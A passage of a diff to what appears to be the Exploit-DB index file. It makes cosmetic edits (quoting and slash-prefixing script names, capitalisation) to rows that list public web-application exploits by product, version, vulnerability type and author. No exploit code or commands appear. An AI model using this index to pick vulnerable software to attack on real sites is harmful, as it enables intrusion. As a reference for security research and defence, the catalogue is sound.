Inclusion",2008-12-09,CoBRa_21,php,webapps,0 7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting",2008-12-09,ahmadbady,php,webapps,0 7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - Command Execution",2008-12-10,ZeN,cgi,webapps,0 7406,platforms/php/webapps/7406.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps,0 @@ -21440,7 +21441,7 @@ id,file,description,date,author,platform,type,port 8071,platforms/php/webapps/8071.txt,"S-CMS 1.1 Stable - Insecure Cookie Handling / Mass Page Delete Vulnerabilities",2009-02-17,x0r,php,webapps,0 8072,platforms/php/webapps/8072.txt,"pHNews Alpha 1 - 'mod' SQL Injection",2009-02-17,x0r,php,webapps,0 8073,platforms/php/webapps/8073.txt,"pHNews Alpha 1 - 'genbackup.php' Database Disclosure",2009-02-17,x0r,php,webapps,0 -8075,platforms/php/webapps/8075.pl,"Firepack - 'admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0 +8075,platforms/php/webapps/8075.pl,"Firepack - '/admin/ref.php' Remote Code Execution",2009-02-18,Lidloses_Auge,php,webapps,0 8076,platforms/php/webapps/8076.txt,"smNews 1.0 - Authentication Bypass/Column Truncation Vulnerabilities",2009-02-18,x0r,php,webapps,0 8083,platforms/php/webapps/8083.txt,"phpBB 3 - 'autopost bot mod 0.1.3' Remote File Inclusion",2009-02-20,Kacper,php,webapps,0 8085,platforms/cgi/webapps/8085.txt,"i-dreams Mailer 1.2 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 @@ -21627,7 +21628,7 @@ id,file,description,date,author,platform,type,port 8454,platforms/php/webapps/8454.txt,"DNS Tools (PHP Digger) - Remote Command Execution",2009-04-16,SirGod,php,webapps,0 8455,platforms/php/webapps/8455.txt,"CPCommerce 1.2.8 - 'id_document' Blind SQL Injection",2009-04-16,NoGe,php,webapps,0 8457,platforms/php/webapps/8457.txt,"NetHoteles 3.0 - 'ficha.php' SQL Injection",2009-04-16,snakespc,php,webapps,0 -8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - 'manage-admin.php' Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 +8459,platforms/php/webapps/8459.htm,"eLitius 1.0 - '/manage-admin.php' Add Admin/Change Password Exploit",2009-04-16,"ThE g0bL!N",php,webapps,0 8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusions",2009-04-16,JosS,php,webapps,0 8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 - (Login Bypass) SQL Injection",2009-04-16,tmh,php,webapps,0 8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 - Authentication Bypass",2009-04-17,"Salvatore Fresta",php,webapps,0 @@ -21776,7 +21777,7 @@ id,file,description,date,author,platform,type,port 8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password",2009-05-18,Abysssec,asp,webapps,0 8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 - 'id' SQL Injection",2009-05-18,Mi4night,php,webapps,0 8725,platforms/php/webapps/8725.php,"Jieqi CMS 1.5 - Remote Code Execution",2009-05-18,Securitylab.ir,php,webapps,0 -8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - 'inc/ajax.asp' SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 +8726,platforms/asp/webapps/8726.txt,"MaxCMS 2.0 - '/inc/ajax.asp' SQL Injection",2009-05-18,Securitylab.ir,asp,webapps,0 8727,platforms/php/webapps/8727.txt,"DGNews 3.0 Beta - 'id' SQL Injection",2009-05-18,Cyber-Zone,php,webapps,0 8728,platforms/php/webapps/8728.htm,"PHP Article Publisher - Remote Change Admin Password",2009-05-18,ahmadbady,php,webapps,0 8730,platforms/php/webapps/8730.txt,"VidShare Pro - Arbitrary File Upload",2009-05-19,InjEctOr5,php,webapps,0 @@ -22036,7 +22037,7 @@ id,file,description,date,author,platform,type,port 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b - Arbitrary File Upload",2009-07-09,"ThE g0bL!N",php,webapps,0 9087,platforms/php/webapps/9087.php,"Nwahy Dir 2.1 - Arbitrary Change Admin Password",2009-07-09,rEcruit,php,webapps,0 9088,platforms/php/webapps/9088.txt,"Glossword 1.8.11 - Arbitrary Uninstall / Install",2009-07-09,Evil-Cod3r,php,webapps,0 -9089,platforms/php/webapps/9089.txt,"ClearContent - 'image.php url' Local/Remote File Inclusion",2009-07-09,MizoZ,php,webapps,0 +9089,platforms/php/webapps/9089.txt,"ClearContent - '/image.php url' Local/Remote File Inclusion",2009-07-09,MizoZ,php,webapps,0 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps,0 9092,platforms/php/webapps/9092.txt,"webasyst shop-script - Blind SQL Injection / Cross-Site Scripting",2009-07-09,Vrs-hCk,php,webapps,0 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0 @@ -22048,7 +22049,7 @@ id,file,description,date,author,platform,type,port 9105,platforms/php/webapps/9105.txt,"MyMsg 1.0.3 - 'uid' SQL Injection",2009-07-10,Monster-Dz,php,webapps,0 9107,platforms/php/webapps/9107.txt,"Phenotype CMS 2.8 - 'login.php user' Blind SQL Injection",2009-07-10,"Khashayar Fereidani",php,webapps,0 9109,platforms/php/webapps/9109.txt,"ToyLog 0.1 - SQL Injection / Remote Code Execution",2009-07-10,darkjoker,php,webapps,0 -9110,platforms/php/webapps/9110.txt,"WordPress Core / MU / Plugins - 'admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0 +9110,platforms/php/webapps/9110.txt,"WordPress Core / MU / Plugins - '/admin.php' Privileges Unchecked / Multiple Information Disclosures",2009-07-10,"Core Security",php,webapps,0 9111,platforms/php/webapps/9111.txt,"Jobbr 2.2.7 - Multiple SQL Injections",2009-07-10,Moudi,php,webapps,0 9112,platforms/php/webapps/9112.txt,"Joomla! Component com_propertylab - (auction_id) SQL Injection",2009-07-10,"Chip d3 bi0s",php,webapps,0 9115,platforms/php/webapps/9115.txt,"Digitaldesign CMS 0.1 - Remote Database Disclosure",2009-07-10,darkjoker,php,webapps,0 @@ -22062,7 +22063,7 @@ id,file,description,date,author,platform,type,port 9129,platforms/php/webapps/9129.txt,"censura 1.16.04 - Blind SQL Injection / Cross-Site Scripting",2009-07-12,Vrs-hCk,php,webapps,0 9130,platforms/php/webapps/9130.txt,"PHP AdminPanel Free 1.0.5 - Remote File Disclosure",2009-07-12,"Khashayar Fereidani",php,webapps,0 9132,platforms/php/webapps/9132.py,"RunCMS 1.6.3 - Remote Shell Injection",2009-07-13,StAkeR,php,webapps,0 -9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - products.php SQL Injection",2009-07-13,Affix,php,webapps,0 +9138,platforms/php/webapps/9138.txt,"onepound shop 1.x - 'products.php' SQL Injection",2009-07-13,Affix,php,webapps,0 9140,platforms/cgi/webapps/9140.txt,"DJ Calendar - 'DJcalendar.cgi TEMPLATE' File Disclosure",2009-07-14,cibbao,cgi,webapps,0 9144,platforms/php/webapps/9144.txt,"Mobilelib Gold 3.0 - Local File Disclosure",2009-07-14,Qabandi,php,webapps,0 9145,platforms/php/webapps/9145.php,"Traidnt UP 2.0 - Blind SQL Injection",2009-07-14,Qabandi,php,webapps,0 @@ -22085,7 +22086,7 @@ id,file,description,date,author,platform,type,port 9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0 9182,platforms/php/webapps/9182.txt,"AJOX Poll - 'managepoll.php' Authentication Bypass",2009-07-17,SirGod,php,webapps,0 9183,platforms/php/webapps/9183.txt,"Battle Blog 1.25 - Authentication Bypass / SQL Injection / HTML Injection",2009-07-17,$qL_DoCt0r,php,webapps,0 -9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 - SITE_fiche.php SQL Injection",2009-07-17,DeCo017,php,webapps,0 +9184,platforms/php/webapps/9184.txt,"Ger Versluis 2000 5.5 24 - 'SITE_fiche.php' SQL Injection",2009-07-17,DeCo017,php,webapps,0 9185,platforms/php/webapps/9185.txt,"good/bad vote - Cross-Site Scripting / Local File Inclusion",2009-07-17,Moudi,php,webapps,0 9187,platforms/php/webapps/9187.txt,"Joomla! Component Jobline 1.3.1 - Blind SQL Injection",2009-07-17,ManhLuat93,php,webapps,0 9193,platforms/php/webapps/9193.pl,"WebVision 2.1 - 'news.php n' SQL Injection",2009-07-17,Mr.tro0oqy,php,webapps,0 @@ -22220,7 +22221,7 @@ id,file,description,date,author,platform,type,port 9413,platforms/php/webapps/9413.txt,"Joomla! Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps,0 9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - (systemid) SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps,0 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b - (Authentication Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps,0 -9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 - 'gallery.php' Arbitrary Delete/Edit Category",2009-08-12,"ilker Kandemir",php,webapps,0 +9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category",2009-08-12,"ilker Kandemir",php,webapps,0 9424,platforms/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injections",2009-08-12,"Sense of Security",php,webapps,0 9425,platforms/php/webapps/9425.sh,"Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution",2009-08-12,IHTeam,php,webapps,0 9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 @@ -22357,7 +22358,7 @@ id,file,description,date,author,platform,type,port 9714,platforms/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0 9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0 9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - 'header.php' Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0 -9719,platforms/multiple/webapps/9719.txt,"FanUpdate 2.2.1 - show-cat.php SQL Injection",2009-09-18,"(In)Security Romania",multiple,webapps,0 +9719,platforms/multiple/webapps/9719.txt,"FanUpdate 2.2.1 - 'show-cat.php' SQL Injection",2009-09-18,"(In)Security Romania",multiple,webapps,0 9720,platforms/multiple/webapps/9720.txt,"FSphp 0.2.1 - Multiple Remote File Inclusions",2009-09-18,NoGe,multiple,webapps,0 9721,platforms/multiple/webapps/9721.txt,"Joomla! Component com_surveymanager 1.5.0 - SQL Injection (stype)",2009-09-21,kaMtiEz,multiple,webapps,0 9722,platforms/multiple/webapps/9722.txt,"DDL CMS 1.0 - Multiple Remote File Inclusions",2009-09-21,HxH,multiple,webapps,0 @@ -22373,7 +22374,7 @@ id,file,description,date,author,platform,type,port 9801,platforms/php/webapps/9801.txt,"Flatpress 0.804 < 0.812.1 - Local File Inclusion",2009-09-29,"Giuseppe Fuggiano",php,webapps,0 9809,platforms/asp/webapps/9809.txt,"HEAT Call Logging 8.01 - SQL Injection",2009-09-28,"0 0",asp,webapps,0 9812,platforms/php/webapps/9812.txt,"Joomla! Component IRCm Basic - SQL Injection",2009-09-28,kaMtiEz,php,webapps,0 -9818,platforms/php/webapps/9818.txt,"Klonet E-Commerce - products.php SQL Injection",2009-09-25,S3T4N,php,webapps,0 +9818,platforms/php/webapps/9818.txt,"Klonet E-Commerce - 'products.php' SQL Injection",2009-09-25,S3T4N,php,webapps,0 9819,platforms/multiple/webapps/9819.txt,"Engeman 6.x - SQL Injection",2009-09-25,crashbrz,multiple,webapps,0 9820,platforms/php/webapps/9820.txt,"Regental Medien - Blind SQL Injection",2009-09-24,NoGe,php,webapps,0 9821,platforms/php/webapps/9821.txt,"FSphp 0.2.1 - Remote File Inclusion",2009-09-24,NoGe,php,webapps,0 @@ -22402,7 +22403,7 @@ id,file,description,date,author,platform,type,port 9857,platforms/asp/webapps/9857.txt,"AfterLogic WebMail Pro 4.7.10 - Cross-Site Scripting",2009-10-05,"Sébastien Duquette",asp,webapps,0 9861,platforms/unix/webapps/9861.rb,"Nagios3 - statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0 9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps,0 -9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - folder Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 +9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - Folder Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0 9873,platforms/windows/webapps/9873.txt,"Cherokee 0.5.4 - Directory Traversal",2009-10-28,Dr_IDE,windows,webapps,0 9875,platforms/php/webapps/9875.txt,"CubeCart 4 - Session Management Bypass",2009-10-30,"Bogdan Calin",php,webapps,0 @@ -22431,7 +22432,7 @@ id,file,description,date,author,platform,type,port 9926,platforms/php/webapps/9926.rb,"Joomla! Plugin tinybrowser 1.5.12 - Arbitrary File Upload / Execution",2009-07-22,spinbad,php,webapps,0 9933,platforms/php/webapps/9933.txt,"PHP168 6.0 - Command Execution",2009-10-28,"Securitylab Security Research",php,webapps,0 9958,platforms/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,jsp,webapps,0 -9961,platforms/php/webapps/9961.txt,"phpCMS 2008 - file Disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 +9961,platforms/php/webapps/9961.txt,"phpCMS 2008 - File Disclosure",2009-10-19,"Securitylab Security Research",php,webapps,0 16007,platforms/php/webapps/16007.txt,"AneCMS 1.3 - Persistent Cross-Site Scripting",2011-01-17,Penguin,php,webapps,0 9962,platforms/php/webapps/9962.txt,"Piwik 1357 2009-08-02 - Arbitrary File Upload / Code Execution",2009-10-19,boecke,php,webapps,0 9963,platforms/asp/webapps/9963.txt,"QuickTeam 2.2 - SQL Injection",2009-10-14,"drunken danish rednecks",asp,webapps,0 @@ -22457,7 +22458,7 @@ id,file,description,date,author,platform,type,port 10049,platforms/php/webapps/10049.pl,"EZsneezyCal CMS 95.1-95.2 - Remote File Inclusion",2009-10-12,kaMtiEz,php,webapps,0 10050,platforms/php/webapps/10050.pl,"EZRecipeZee CMS 91 - Remote File Inclusion",2009-10-12,kaMtiEz,php,webapps,0 10051,platforms/php/webapps/10051.txt,"QuickCart 3.x - Cross-Site Scripting / Cross-Site Request Forgery / Local File Inclusion / Directory Traversal",2009-10-08,kl3ryk,php,webapps,0 -10052,platforms/php/webapps/10052.txt,"The BMW - inventory.php SQL Injection",2009-10-08,Dazz,php,webapps,0 +10052,platforms/php/webapps/10052.txt,"The BMW - 'inventory.php' SQL Injection",2009-10-08,Dazz,php,webapps,0 10057,platforms/php/webapps/10057.txt,"AIOCP 1.4.001 - Remote File Inclusion",2009-10-07,"Hadi Kiamarsi",php,webapps,0 10058,platforms/php/webapps/10058.pl,"Joomla! Component Recerca - SQL Injection",2009-10-07,"Don Tukulesto",php,webapps,0 10059,platforms/jsp/webapps/10059.txt,"McAfee Network Security Manager < 5.1.11.8.1 - Information Disclosure",2009-11-12,"Daniel King",jsp,webapps,0 @@ -22473,7 +22474,7 @@ id,file,description,date,author,platform,type,port 10085,platforms/jsp/webapps/10085.txt,"toutvirtual virtualiq pro 3.2 - Multiple Vulnerabilities",2009-11-07,"Alberto Trivero",jsp,webapps,0 10088,platforms/php/webapps/10088.txt,"WordPress 2.0 < 2.7.1 - 'admin.php' Module Configuration Security Bypass",2009-11-10,"Fernando Arnaboldi",php,webapps,0 10089,platforms/php/webapps/10089.txt,"WordPress < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",php,webapps,0 -10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - 'wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 +10090,platforms/php/webapps/10090.txt,"WordPress MU 1.2.2 < 1.3.1 - '/wp-includes/wpmu-functions.php' Cross-Site Scripting",2009-11-10,"Juan Galiana Lara",php,webapps,0 10094,platforms/jsp/webapps/10094.txt,"IBM Rational RequisitePro 7.10 / ReqWebHelp - Multiple Cross-Site Scripting Vulnerabilities",2009-10-15,IBM,jsp,webapps,0 10096,platforms/php/webapps/10096.txt,"OS Commerce 2.2r2 - Authentication Bypass",2009-11-13,"Stuart Udall",php,webapps,0 10101,platforms/php/webapps/10101.txt,"telepark wiki 2.4.23 - Multiple Vulnerabilities",2009-11-16,Abysssec,php,webapps,0 @@ -23224,7 +23225,7 @@ id,file,description,date,author,platform,type,port 11486,platforms/php/webapps/11486.txt,"PHPIDS 0.4 - Remote File Inclusion",2010-02-17,eidelweiss,php,webapps,0 11487,platforms/php/webapps/11487.txt,"Auktionshaus 4 - 'news.php' SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 11488,platforms/php/webapps/11488.txt,"Auktionshaus Gelb 3 - 'news.php' SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 -11489,platforms/php/webapps/11489.txt,"Erotik Auktionshaus - news.php SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 +11489,platforms/php/webapps/11489.txt,"Erotik Auktionshaus - 'news.php' SQL Injection",2010-02-17,"Easy Laster",php,webapps,0 11490,platforms/php/webapps/11490.txt,"PunBBAnnuaire 0.4 - Blind SQL Injection",2010-02-17,Metropolis,php,webapps,0 11494,platforms/php/webapps/11494.txt,"Joomla! Component com_otzivi - Local File Inclusion",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps,0 11495,platforms/php/webapps/11495.txt,"CubeCart - 'index.php' SQL Injection",2010-02-18,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -23277,7 +23278,7 @@ id,file,description,date,author,platform,type,port 11578,platforms/php/webapps/11578.php,"Joomla! Component com_Joomlaconnect_be - Blind Injection",2010-02-25,snakespc,php,webapps,0 11579,platforms/php/webapps/11579.txt,"WebAdministrator Lite CMS - SQL Injection",2010-02-25,Ariko-Security,php,webapps,0 11580,platforms/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,ViRuSMaN,aix,webapps,0 -11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - news.php SQL Injection",2010-02-27,"Easy Laster",php,webapps,0 +11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - 'news.php' SQL Injection",2010-02-27,"Easy Laster",php,webapps,0 11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps,0 11584,platforms/php/webapps/11584.txt,"Project Man 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps,0 11585,platforms/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,php,webapps,0 @@ -23302,7 +23303,7 @@ id,file,description,date,author,platform,type,port 11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,php,webapps,0 11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Arbitrary File Upload",2010-03-02,indoushka,php,webapps,0 11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection - Arbitrary File Upload",2010-03-02,indoushka,php,webapps,0 -11616,platforms/php/webapps/11616.txt,"My Little Forum - contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 +11616,platforms/php/webapps/11616.txt,"My Little Forum - 'contact.php' SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11619,platforms/php/webapps/11619.txt,"Uiga Church Portal - 'index.php' SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi (DosyaYukle Scripti) 1.0 - Arbitrary File Upload",2010-03-03,indoushka,php,webapps,0 11621,platforms/php/webapps/11621.txt,"Gnat-TGP 1.2.20 - Remote File Inclusion",2010-03-03,cr4wl3r,php,webapps,0 @@ -23310,14 +23311,14 @@ id,file,description,date,author,platform,type,port 11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps,0 11625,platforms/php/webapps/11625.txt,"Joomla! Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps,0 11627,platforms/php/webapps/11627.txt,"PHP-Nuke CMS (Survey and Poll) - SQL Injection",2010-03-04,SENOT,php,webapps,0 -11631,platforms/php/webapps/11631.txt,"PHP-Nuke - user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0 +11631,platforms/php/webapps/11631.txt,"PHP-Nuke - 'user.php' SQL Injection",2010-03-04,"Easy Laster",php,webapps,0 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps,0 11635,platforms/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 11636,platforms/php/webapps/11636.php,"Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0 11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - (linkid) Blind SQL Injection",2010-03-05,JosS,php,webapps,0 11641,platforms/php/webapps/11641.txt,"PHPCOIN 1.2.1 - 'mod.php' Local File Inclusion",2010-03-06,_mlk_,php,webapps,0 -11643,platforms/php/webapps/11643.txt,"dev4u CMS - (Personenseiten) go_target.php SQL Injection",2010-03-06,"Easy Laster",php,webapps,0 +11643,platforms/php/webapps/11643.txt,"dev4u CMS (Personenseiten) - 'go_target.php' SQL Injection",2010-03-06,"Easy Laster",php,webapps,0 11646,platforms/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps,0 11648,platforms/php/webapps/11648.txt,"Bild Flirt System 2.0 - 'index.php id' SQL Injection",2010-03-07,"Easy Laster",php,webapps,0 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - 'id' news.php SQL Injection",2010-03-08,"Easy Laster",php,webapps,0 @@ -23326,7 +23327,7 @@ id,file,description,date,author,platform,type,port 11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0 11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re_ R4vax",php,webapps,0 11667,platforms/php/webapps/11667.txt,"Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps,0 -11671,platforms/php/webapps/11671.txt,"mhproducts Kleinanzeigenmarkt - search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 +11671,platforms/php/webapps/11671.txt,"mhproducts Kleinanzeigenmarkt - 'search.php' SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 11672,platforms/php/webapps/11672.txt,"Wild CMS - SQL Injection",2010-03-09,Ariko-Security,php,webapps,0 11674,platforms/php/webapps/11674.txt,"nus newssystem 1.02 - 'id' SQL Injection",2010-03-09,n3w7u,php,webapps,0 11676,platforms/php/webapps/11676.txt,"Campsite 3.3.5 - Cross-Site Request Forgery",2010-03-10,"pratul agrawal",php,webapps,0 @@ -23350,7 +23351,7 @@ id,file,description,date,author,platform,type,port 11699,platforms/php/webapps/11699.txt,"Joomla! Component com_family - SQL Injection",2010-03-12,"DevilZ TM",php,webapps,0 11701,platforms/php/webapps/11701.txt,"Easynet Forum Host - 'topic.php' SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - (edit) SQL Injection",2010-03-12,"Yakir Wizman",php,webapps,0 -11704,platforms/php/webapps/11704.txt,"dreamlive Auktionshaus script - news.php 'id' SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 +11704,platforms/php/webapps/11704.txt,"dreamlive Auktionshaus script - 'news.php?id' SQL Injection",2010-03-12,"Easy Laster",php,webapps,0 11707,platforms/php/webapps/11707.txt,"Joomla! Component com_juliaportfolio - Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 11708,platforms/php/webapps/11708.txt,"Joomla! Component com_sbsfile - Local File Inclusion",2010-03-13,"DevilZ TM",php,webapps,0 11709,platforms/php/webapps/11709.txt,"Joomla! Component com_comp - SQL Injection",2010-03-13,"DevilZ TM",php,webapps,0 @@ -23426,9 +23427,9 @@ id,file,description,date,author,platform,type,port 11813,platforms/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps,0 11814,platforms/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps,0 11815,platforms/php/webapps/11815.txt,"Joomla! Component Gift Exchange com_giftexchange 1.0 Beta - (pkg) SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps,0 -11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - (id_auk) auktion.php Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0 +11816,platforms/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - 'auktion.php?id_auk' Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps,0 11823,platforms/cgi/webapps/11823.txt,"Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download",2010-03-20,n01d,cgi,webapps,0 -11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - ts_other.php SQL Injection",2010-03-21,"Easy Laster",php,webapps,0 +11824,platforms/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - 'ts_other.php' SQL Injection",2010-03-21,"Easy Laster",php,webapps,0 11825,platforms/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps,0 11826,platforms/php/webapps/11826.txt,"Jewelry Cart Software - 'product.php' SQL Injection",2010-03-21,Asyraf,php,webapps,0 11829,platforms/php/webapps/11829.txt,"Woltlab Burning Board Lite Addon - 'lexikon.php' SQL Injection",2010-03-21,n3w7u,php,webapps,0 @@ -23922,7 +23923,7 @@ id,file,description,date,author,platform,type,port 12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0 12607,platforms/php/webapps/12607.txt,"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion",2010-05-14,ALTBTA,php,webapps,0 12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - 'photogallery_open.php' SQL Injection",2010-05-14,CoBRa_21,php,webapps,0 -12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum - 'buyer/index.php' SQL Injection",2010-05-14,GuN,php,webapps,0 +12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum - '/buyer/index.php' SQL Injection",2010-05-14,GuN,php,webapps,0 12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps,0 12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0 12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0 @@ -23970,7 +23971,7 @@ id,file,description,date,author,platform,type,port 12674,platforms/php/webapps/12674.txt,"webYourPhotos 6.05 - 'index.php' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple Vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps,0 -28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 - 'admin/editconfig.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 +28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 - '/admin/editconfig.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusions",2006-06-17,"M.Hasran Addahroni",php,webapps,0 28048,platforms/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 28128,platforms/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple 